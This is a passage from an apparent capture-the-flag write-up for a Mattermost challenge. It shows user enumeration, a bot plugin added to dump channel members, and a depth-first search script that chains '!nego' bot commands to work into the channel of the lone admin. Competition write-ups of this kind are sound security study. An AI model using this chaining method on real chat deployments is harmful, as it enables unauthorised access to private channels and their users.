nmaweowaup8c3cagki3e6q5r5o: bubblyowl66 (bubblyowl66@malware.xyz)
4o3okzr34in6xkdmsrahtzxskw: calls (calls@localhost)
5uo9s769utfa3m8wjq1hkgmpih: cautiousferret5 (cautiousferret5@malware.xyz)
rbtwjkm6hfgy8badbenz8t7fca: cruelbass14 (cruelbass14@malware.xyz)
jtqbrh6s7irwjr7jrzokpkfhwa: emptyshads41 (emptyshads41@malware.xyz)
nwfsa6s5iig4fyb4w643u8qkga: giddythrushe28 (giddythrushe28@malware.xyz)
zxkh7mqq5pre7pkzghwj6uy6ra: insecurebasmati34 (insecurebasmati34@malware.xyz)
eidtpjuz8jy3bd5zd3bzhsdjpr: malbot (malbot@localhost)
4zdxb76a17fiz8r43gri7ctbwy: mod_aboardhoopoe59 (mod_aboardhoopoe59@malware.xyz)
jeswn63kmjb1ixhfmxz4crfewa: mod_affectedeagle51 (mod_affectedeagle51@malware.xyz)
bhsh5hnx57fcf8rpud5w8xn8dc: mod_ecstaticcheese60 (mod_ecstaticcheese60@malware.xyz)
txjizyhehin67q64wektejoczy: mod_euphoriccoati77 (mod_euphoriccoati77@malware.xyz)
r9uhopksxfgy8xz8ifpk5y47wh: mod_murkygatorade10 (mod_murkygatorade10@malware.xyz)
1tmkcjt6m3g59kry1pfixqznzr: mod_wingedlion39 (mod_wingedlion39@malware.xyz)
jg7ie7kxj3bqjrp3rjb8h5e1kc: morbidcoconut10 (morbidcoconut10@malware.xyz)
qufpxm9t9fnjib3satjb5dua1r: playbooks (playbooks@localhost)
oywfbkfe97d1mkyqx3ubsq4p5c: resolvedpoultry53 (resolvedpoultry53@malware.xyz)
cby3we3cmtr33xdrs5twqok9jc: system-bot (system-bot@localhost)
aua8kgt6yp878pct86oefoog8w: thriftyjerky58 (thriftyjerky58@malware.xyz)
p6i8dfapjjrqudmz3qfuyk3mra: wrathfulfalcon8 (wrathfulfalcon8@malware.xyz)
There are 22 users on local instance

While we are at it, we also need to make a token for our bot to actually run. This can also be done with mmctl:

Terminal window
$ docker compose exec mattermost mmctl --local token generate malbot "bot api token"
i6utw8yaytna9xz81sogmrxc6y: bot api token

We can put this token in the bot.py, and also fix the team name while we are at it:

bot/bot.py
bot = Bot(
settings=Settings(
MATTERMOST_URL = os.environ.get("MATTERMOST_URL", "http://127.0.0.1"),
MATTERMOST_PORT = int(os.environ.get("MATTERMOST_PORT", 8065)),
BOT_TOKEN = os.environ.get("BOT_TOKEN", "i6utw8yaytna9xz81sogmrxc6y"),
BOT_TEAM = os.environ.get("BOT_TEAM", "malwarecentral"),
SSL_VERIFY = os.environ.get("SSL_VERIFY", "False") == "True",
RESPOND_CHANNEL_HELP=True,
),
plugins=[SalesPlugin(), HelpPlugin(), OnboardingPlugin(),ManageChannelPlugin(),AdminPlugin()],
)

Now back to the nego command. As part of our requirements, we need to ensure that users we provide are not members of the target channel, so we need some way to dump the users of a given channel. However, as it turns out, there is no such way to do so with mmctl!

But I didn’t want to bother figuring out how to use the API directly, so I just hijacked the bot to add a command that would dump the members of a given channel for me. I added the following command to plugin_sales.py:

bot/plugin_sales.py
@listen_to("^!list_users (.*)$", no_direct=True, human_description="!list_users\n\tList all users in the given channel(s).")
def list_users_cmd(self, message: Message, *args):
logger.debug(f"list_users_cmd called with message: {message.text}")
args = message.text.strip().split()
if len(args) < 2:
self.driver.reply_to(message, "Usage: !list_users channel_name [channel_name ...]")
logger.warning("list_users_cmd: Incorrect number of arguments")
return
_, *channel_names = args
for channel_name in channel_names:
team_name = self.driver.options.get('team', 'malwarecentral')
team = self.driver.teams.get_team_by_name(team_name)
team_id = team.get('id') if isinstance(team, dict) else team.json().get('id')
channel = self.driver.channels.get_channel_by_name(team_id, channel_name)
if not channel:
self.driver.reply_to(message, f"Channel '{channel_name}' not found.")
logger.warning(f"list_users_cmd: Channel '{channel_name}' not found.")
return
channel_id = channel.get('id') if isinstance(channel, dict) else channel.json().get('id')
members = self.driver.channels.get_channel_members(channel_id)
user_list = []
for member in members:
user_id = member.get('user_id')
user = self.driver.users.get_user(user_id)
username = user.get('username') if isinstance(user, dict) else user.json().get('username')
user_list.append(username)
self.driver.reply_to(message, f"Users in channel '{channel_name}':\n{user_list}")
logger.info(f"list_users_cmd: Listed users in channel '{channel_name}'")

Now we simply take all the channel names we dumped earlier, and run the command on all of them. Then we wait for the bot to do the work for us, and extract the usernames from the replies:

Terminal window
# for some reason other versions may be a bit unstable, blame python
uv venv -p python3.12
source .venv/bin/activate
uv pip install mmpy_bot loguru dotenv
python3 bot.py

bot responding with users in channels

This gives us a final list of channels and their users:

channels.txt
'public':
['mod_murkygatorade10', 'emptyshads41', 'cruelbass14', 'bubblyowl66', 'giddythrushe28', 'cautiousferret5', 'malbot', 'resolvedpoultry53', 'insecurebasmati34']
'channel14210':
['mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'resolvedpoultry53', 'mod_murkygatorade10', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel15769':
['insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel23011':
['giddythrushe28', 'wrathfulfalcon8', 'insecurebasmati34', 'resolvedpoultry53', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'mod_euphoriccoati77', 'malbot']
'channel28375':
['bubblyowl66', 'cruelbass14', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'mod_murkygatorade10', 'mod_wingedlion39', 'mod_affectedeagle51', 'emptyshads41', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'malbot', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel36984':
['thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'cruelbass14', 'malbot', 'bubblyowl66', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel37915':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34']
'channel41964':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'resolvedpoultry53', 'mod_euphoriccoati77', 'alertfish82', 'malbot', 'mod_ecstaticcheese60', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10']
'channel42011':
['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'emptyshads41', 'bubblyowl66', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'mod_aboardhoopoe59', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'admin_zestysnail91', 'insecurebasmati34', 'malbot', 'cruelbass14']
'channel43502':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14']
'channel45015':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel46360':
['mod_aboardhoopoe59', 'morbidcoconut10', 'mod_wingedlion39', 'mod_ecstaticcheese60', 'mod_affectedeagle51', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_murkygatorade10', 'insecurebasmati34', 'malbot', 'cruelbass14', 'alertfish82', 'wrathfulfalcon8', 'mod_euphoriccoati77']
'channel51816':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'wrathfulfalcon8', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel56398':
['mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'emptyshads41', 'cruelbass14', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'malbot', 'thriftyjerky58', 'mod_affectedeagle51', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel60311':
['alertfish82', 'mod_aboardhoopoe59', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'mod_euphoriccoati77', 'insecurebasmati34', 'malbot', 'mod_wingedlion39', 'mod_affectedeagle51', 'morbidcoconut10', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel60871':
['cruelbass14', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'morbidcoconut10', 'alertfish82', 'bubblyowl66', 'malbot', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel6153':
['mod_affectedeagle51', 'morbidcoconut10', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel62240':
['wrathfulfalcon8', 'mod_affectedeagle51', 'mod_euphoriccoati77', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'malbot', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60']
'channel62739':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77']
'channel64089':
['mod_euphoriccoati77', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14']
'channel76379':
['mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel77848':
['mod_wingedlion39', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51', 'morbidcoconut10', 'emptyshads41', 'alertfish82', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'cruelbass14', 'mod_euphoriccoati77', 'insecurebasmati34']
'channel78377':
['emptyshads41', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_wingedlion39', 'insecurebasmati34', 'cruelbass14', 'malbot', 'morbidcoconut10', 'bubblyowl66', 'giddythrushe28', 'resolvedpoultry53', 'mod_murkygatorade10', 'mod_euphoriccoati77']
'channel91739':
['alertfish82', 'mod_euphoriccoati77', 'morbidcoconut10', 'emptyshads41', 'giddythrushe28', 'wrathfulfalcon8', 'mod_murkygatorade10', 'cruelbass14', 'insecurebasmati34', 'mod_wingedlion39', 'mod_aboardhoopoe59', 'thriftyjerky58', 'mod_ecstaticcheese60', 'malbot', 'mod_affectedeagle51']

Given that the user admin_zestysnail91 only exists in one channel, and they are the only admin in the instance, that is probably our goal adversary that we need to reach, meaning we somehow need to reach channel42011 using only nego commands.

The final stretch

To find a valid path, we can write a quick DFS script that will check all the channels reachable from every channel we can access, until we find one that contains admin_zestysnail91.

solve.py
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')
channels = {
channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels
}
ME = 'cautiousferret5'
start = 'public'
end = 'channel42011'
def find_members(channel_a, channel_b):
# return a group of members that we can use to move from channel_a to channel_b
usable_members = set(channels[channel_a]) - set(channels[channel_b])
if ME not in usable_members:
return None
usable_members.remove(ME)
mods = [user for user in usable_members if user.startswith('mod_')]
if len(mods) < 1:
return None
mod = mods[0]
non_mods = [user for user in usable_members if not user.startswith('mod_')]
if len(non_mods) < 2:
return None
return [ME] + non_mods[:2] + [mod]
def dfs(current, path):
print(f'At {current}, path {path}')
for channel in channels:
members = find_members(current, channel)
if not members:
continue
if channel == end:
return path + [(channel, members)]
result = dfs(channel, path + [(channel, members)])
if result:
return result
return None
path = dfs(start, [(start, [])])
for channel, members in path[1:]:
print(f'!nego {channel} ' + ' '.join(members[1:]))

However, if we run this script, we don’t get anything…

Terminal window
$ python3 solve_1.py
At public, path [('public', [])]
At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'insecurebasmati34', 'cruelbass14', 'mod_murkygatorade10'])]
Traceback (most recent call last):
File "/mnt/c/Users/flocto/Documents/Cybersecurity/2025/NSACodebreaker/task6/writeup/solve_1.py", line 44, in <module>
for channel, members in path:
TypeError: 'NoneType' object is not iterable

I was stuck here for a while until I realized I had overlooked one thing: once we add ourselves to a channel using the !nego command, we bring all the users in the command with us! Then, we can use those users to further move into other channels.

Patching the script to account for that, we get the following final version:

solve.py
28 collapsed lines
users = ['admin_zestysnail91', 'alertfish82', 'bubblyowl66', 'calls', 'cautiousferret5', 'cruelbass14', 'emptyshads41', 'giddythrushe28', 'insecurebasmati34', 'malbot', 'mod_aboardhoopoe59', 'mod_affectedeagle51', 'mod_ecstaticcheese60', 'mod_euphoriccoati77', 'mod_murkygatorade10', 'mod_wingedlion39', 'morbidcoconut10', 'playbooks', 'resolvedpoultry53', 'system', 'thriftyjerky58', 'wrathfulfalcon8']
channels = open('channels.txt').read().split('\n\n')
channels = {
channel.split('\n')[0][1:-2]: eval(channel.split('\n')[1]) for channel in channels
}
ME = 'cautiousferret5'
start = 'public'
end = 'channel42011'
def find_members(channel_a, channel_b):
# return a group of members that we can use to move from channel_a to channel_b
usable_members = set(channels[channel_a]) - set(channels[channel_b])
if ME not in usable_members:
return None
usable_members.remove(ME)
mods = [user for user in usable_members if user.startswith('mod_')]
if len(mods) < 1:
return None
mod = mods[0]
non_mods = [user for user in usable_members if not user.startswith('mod_')]
if len(non_mods) < 2:
return None
return [ME] + non_mods[:2] + [mod]
def dfs(current, path):
print(f'At {current}, path {path}')
for channel in channels:
members = find_members(current, channel)
if not members:
continue
if channel == end:
return path + [(channel, members)]
channels[channel].extend(members) # add all members to the channel
result = dfs(channel, path + [(channel, members)])
if result:
return result
return None
path = dfs(start, [(start, [])])
for channel, members in path[1:]:
print(f'!nego {channel} ' + ' '.join(members[1:]))

This gives us:

Terminal window
$ python3 solve_1.py
At public, path [('public', [])]
At channel62240, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10'])]
At channel43502, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77'])]
At channel78377, path [('public', []), ('channel62240', ['cautiousferret5', 'cruelbass14', 'insecurebasmati34', 'mod_murkygatorade10']), ('channel43502', ['cautiousferret5', 'wrathfulfalcon8', 'insecurebasmati34', 'mod_euphoriccoati77']), ('channel78377', ['cautiousferret5', 'alertfish82', 'wrathfulfalcon8', 'mod_aboardhoopoe59'])]
!nego channel62240 cruelbass14 insecurebasmati34 mod_murkygatorade10
!nego channel43502 wrathfulfalcon8 insecurebasmati34 mod_euphoriccoati77
!nego channel78377 alertfish82 wrathfulfalcon8 mod_aboardhoopoe59
!nego channel42011 alertfish82 morbidcoconut10 mod_affectedeagle51

We can run these commands one by one in Mattermost, and finally we get access to channel42011, where admin_zestysnail91 resides!

reaching the target channel

Submitting the list of commands, we successfully finish task 6.